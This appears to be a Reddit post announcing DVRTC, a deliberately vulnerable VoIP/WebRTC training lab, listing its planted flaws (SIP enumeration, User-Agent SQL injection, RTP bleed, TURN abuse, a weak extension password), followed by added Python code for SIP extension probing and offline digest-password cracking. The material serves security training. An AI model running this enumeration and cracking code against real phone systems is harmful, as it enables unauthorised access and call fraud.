DVRTC: intentionally vulnerable VoIP/WebRTC lab with SIP enumeration, RTP bleed, TURN abuse, and credential cracking exercises
Summary: DVRTC is a platform for VoIP and WebRTC security testing. It deploys Kamailio, Asterisk, rtpengine and coturn to reproduce vulnerability scenarios and provides seven hands-on exercises plus an online instance for practice.

2026-3-27 10:22:7 Author: www.reddit.com (view original) Reads: 4

Author here. DVRTC is our attempt to fill a gap that's been there for a while: web app security has DVWA and friends, but there's been nothing equivalent for VoIP and WebRTC attack techniques.

The first scenario (pbx1) deploys a full stack — Kamailio as the SIP proxy, Asterisk as the back-end PBX, rtpengine for media, coturn for TURN/STUN — with each component configured to exhibit specific vulnerable behaviors:

  • Kamailio returns distinguishable responses for valid vs. invalid extensions (enumeration), logs User-Agent headers to MySQL without sanitisation (SQLi), and has a special handler that triggers digest auth leaks for extension 2000

  • rtpengine uses its default configuration, which enables RTP bleed (leaking media from other sessions) and RTP injection

  • coturn uses hardcoded credentials and a permissive relay policy for the TURN abuse exercise

  • Asterisk has extension 1000 with a weak password (1500) for online cracking

Seven exercises with step-by-step instructions. There's also a live instance at pbx1.dvrtc.net if you want to try it without standing up your own.

Happy to answer questions.
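The two SIP-side exercises the post lists first, extension enumeration from distinguishable proxy responses and cracking a weak digest password, both come down to building a REGISTER, reading the status line, and computing the RFC 2617 digest. The following is an added example written for this page; it is not code from DVRTC or from the post's author. The domain `dvrtc.lab`, the realm, the nonce and the two sample replies are constructed so the block runs offline, and the status-code mapping in `classify()` is an assumed, typical proxy behaviour, not a statement of what pbx1 returns. The extension/password pair 1000/1500 is the one the post names for Asterisk.

```python
"""SIP enumeration and digest-auth helpers (added example, not DVRTC code).

Constructed: domain dvrtc.lab, realm/nonce values, SAMPLE_401/SAMPLE_404.
Assumed: the status-code -> verdict mapping in classify().
"""
import hashlib
import re
import socket
import uuid
from typing import Dict, Iterable, Optional

# Constructed replies standing in for what a proxy might send back.
SAMPLE_401 = (
    "SIP/2.0 401 Unauthorized\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bKabc;rport\r\n"
    'WWW-Authenticate: Digest realm="dvrtc.lab", nonce="4f2e9c1b", algorithm=MD5\r\n'
    "Content-Length: 0\r\n\r\n"
)
SAMPLE_404 = "SIP/2.0 404 Not Found\r\nContent-Length: 0\r\n\r\n"


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def build_register(ext: str, domain: str, call_id: str,
                   authorization: Optional[str] = None) -> str:
    """Minimal REGISTER. User-Agent is the header the post says Kamailio logs unsanitised."""
    lines = [
        f"REGISTER sip:{domain} SIP/2.0",
        f"Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK{call_id[:8]};rport",
        f"From: <sip:{ext}@{domain}>;tag={call_id[:6]}",
        f"To: <sip:{ext}@{domain}>",
        f"Call-ID: {call_id}@192.0.2.10",
        "CSeq: 1 REGISTER",
        f"Contact: <sip:{ext}@192.0.2.10:5060>",
        "Max-Forwards: 70",
        "User-Agent: dvrtc-example",
    ]
    if authorization:
        lines.append("Authorization: " + authorization)
    lines.append("Content-Length: 0")
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_status(reply: str) -> Optional[int]:
    m = re.match(r"SIP/2\.0 (\d{3})", reply)
    return int(m.group(1)) if m else None


def classify(reply: Optional[str]) -> str:
    """Enumeration verdict from the reply (assumed mapping: challenge = exists)."""
    code = parse_status(reply) if reply else None
    if code in (401, 407):
        return "exists (challenged)"
    if code in (403, 404):
        return "no such extension"
    if code == 200:
        return "exists (registered without auth)"
    return "no answer" if code is None else f"other ({code})"


def parse_challenge(reply: str) -> Dict[str, str]:
    """Extract realm/nonce/qop/... from WWW-Authenticate or Proxy-Authenticate."""
    m = re.search(r"^(?:WWW|Proxy)-Authenticate:\s*Digest\s+(.*)$", reply, re.M | re.I)
    if not m:
        return {}
    params: Dict[str, str] = {}
    for key, quoted, bare in re.findall(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', m.group(1).rstrip("\r")):
        params[key.lower()] = quoted or bare
    return params


def digest_response(user: str, realm: str, password: str, method: str, uri: str, nonce: str,
                    qop: Optional[str] = None, nc: str = "00000001", cnonce: Optional[str] = None) -> str:
    """RFC 2617 MD5 digest, with and without qop=auth."""
    ha1 = _md5(f"{user}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    if qop:
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def build_authorization(user: str, password: str, method: str, uri: str, challenge: Dict[str, str]) -> str:
    """Authorization header answering a parsed challenge."""
    qop = "auth" if "auth" in challenge.get("qop", "") else None
    nc, cnonce = "00000001", (uuid.uuid4().hex[:16] if qop else None)
    resp = digest_response(user, challenge["realm"], password, method, uri, challenge["nonce"], qop, nc, cnonce)
    parts = [f'Digest username="{user}"', f'realm="{challenge["realm"]}"', f'nonce="{challenge["nonce"]}"',
             f'uri="{uri}"', f'response="{resp}"', "algorithm=MD5"]
    if qop:
        parts += [f"qop={qop}", f"nc={nc}", f'cnonce="{cnonce}"']
    return ", ".join(parts)


def crack_digest(user: str, realm: str, method: str, uri: str, nonce: str, observed: str,
                 wordlist: Iterable[str], qop: Optional[str] = None, nc: str = "00000001",
                 cnonce: Optional[str] = None) -> Optional[str]:
    """Offline: the password whose digest equals a captured response, or None."""
    for pw in wordlist:
        if digest_response(user, realm, pw, method, uri, nonce, qop, nc, cnonce) == observed:
            return pw
    return None


def probe(host: str, port: int, ext: str, domain: str, timeout: float = 2.0) -> Optional[str]:
    """Send one unauthenticated REGISTER over UDP; raw reply, or None on timeout."""
    msg = build_register(ext, domain, uuid.uuid4().hex)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(msg.encode(), (host, port))
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return None
    return data.decode(errors="replace")


if __name__ == "__main__":
    for r in (SAMPLE_401, SAMPLE_404, None):
        print(classify(r))
    ch = parse_challenge(SAMPLE_401)
    print(build_register("1000", "dvrtc.lab", uuid.uuid4().hex,
                         build_authorization("1000", "1500", "REGISTER", "sip:dvrtc.lab", ch)))
```

Against a live target you would loop `probe(host, 5060, ext, domain)` over a range of extensions and feed each reply to `classify()`; the cracking path is the offline variant (a captured challenge plus the client's response), which is the same MD5 arithmetic the online exercise drives through the server one guess at a time.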


Source: https://www.reddit.com/r/netsec/comments/1s506og/dvrtc_intentionally_vulnerable_voipwebrtc_lab/